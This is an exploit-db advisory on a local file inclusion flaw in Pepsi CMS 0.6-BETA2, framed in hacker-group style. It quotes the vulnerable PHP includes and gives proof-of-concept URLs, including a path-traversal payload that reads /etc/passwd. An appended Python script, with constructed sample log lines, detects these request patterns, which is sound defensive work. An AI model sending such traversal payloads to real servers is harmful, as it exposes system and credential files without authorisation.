Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 – Multiple Local File

  • Author: eidelweiss
    Date: 2010-03-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11938/
  • ########################################################
    	Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability
    ########################################################
    
    	fucking the Web Apps [LFI #1 - attack edition 
    
    Hack0wn! Security Project
    
    
    [+]Software:	Pepsi CMS (Irmin CMS)
    [+]Version:	pepsi-0.6-BETA2
    [+]License:	GNU/GPL
    [+]Source:	http://sourceforge.net/projects/pepsicms/files/
    [+]Risk:		High
    [+]CWE:		CWE-22
    [+]Local:		Yes
    [+]Remote:	No
    
    ########################################################
    
    [!] Discovered :	eidelweiss
    [!] Contact :	eidelweiss[at]cyberservices[dot]com
    [!] Thank`s :	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
    [!] Special To :	JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
    
    ########################################################
    
    -=[Description]=-
    
    	IrminCMS is an extensible and secure CMS (Content Management System) written in PHP.
    	Pepsi CMS is what IrminCMS has become.
    
    
    -=[ Vuln c0de ]=-
    ###############
    	{index.php}
    ###############
    
    <?php
    if(!file_exists(".lock")) {
    	$f = fopen(".basepath", "w");
    	fwrite($f, "<?php define('BASEPATH', '".$_SERVER['DOCUMENT_ROOT']."'); ?>");
    	fclose($f);
    	fclose(fopen(".lock", "w"));
    }
    
    include (".basepath");
    include ("config.php");
    
    //very sweet
    include "includes/template-loader.php";
    
    
    
    ###############
    	{includes/template-loader.php}
    ###############
    
    	include( 'config.php' );
    	include( 'db.php' );
    	//include( 'classes/theme_engine/engine.php' );
    	// $_Root_Path is not set in the lines shown here; the PoC below supplies it in the query string
    	include( $_Root_Path . 'classes/Smarty.class.php' );
    
    ########################################################
    
    -=[ P0C ]=-
    
    	Http://127.0.0.1/PATH/index.php?w=[LFI%]
    
    	Http://127.0.0.1/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00
    
    	
    ########################################################
    
    Related reference from Packetstorm Security:
    http://packetstormsecurity.org/0808-exploits/pepsicms-rfi.txt
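
A detection sketch for the two PoC request shapes above, added here as an example and not part of the original advisory: it scans web-server access logs (assumed to be in combined log format) for a client-supplied `_Root_Path`, direct requests to `includes/template-loader.php`, and traversal segments or null bytes in any query parameter. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')    # request line in combined log format
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')  # a ".." path segment

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so doubly encoded input is inspected in its final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_target(target):
    """Return the reasons a request target matches the advisory's two PoC patterns."""
    parts = urlsplit(target)
    reasons = []
    if parts.path.endswith("/includes/template-loader.php"):
        reasons.append("direct request to include-only file")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)
        if name == "_Root_Path":
            reasons.append("_Root_Path supplied by client")
        if TRAVERSAL_RE.search(value):
            reasons.append(f"path traversal in '{name}'")
        if "\x00" in value:
            reasons.append(f"null byte in '{name}'")
    return reasons

def scan(log_text):
    """Yield (line_number, reasons) for each suspicious line of an access log."""
    for number, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        reasons = inspect_target(match.group(1)) if match else []
        if reasons:
            yield number, reasons

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Mar/2010:10:00:01 +0000] "GET /PATH/index.php?w=home HTTP/1.1" 200 5120
192.0.2.77 - - [30/Mar/2010:10:00:05 +0000] "GET /PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1873
192.0.2.77 - - [30/Mar/2010:10:00:09 +0000] "GET /PATH/index.php?w=..%2f..%2fconfig.php%00 HTTP/1.1" 200 420
"""

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

Any hit on `_Root_Path` is worth alerting on by itself, since the parameter has no reason to appear in a client request.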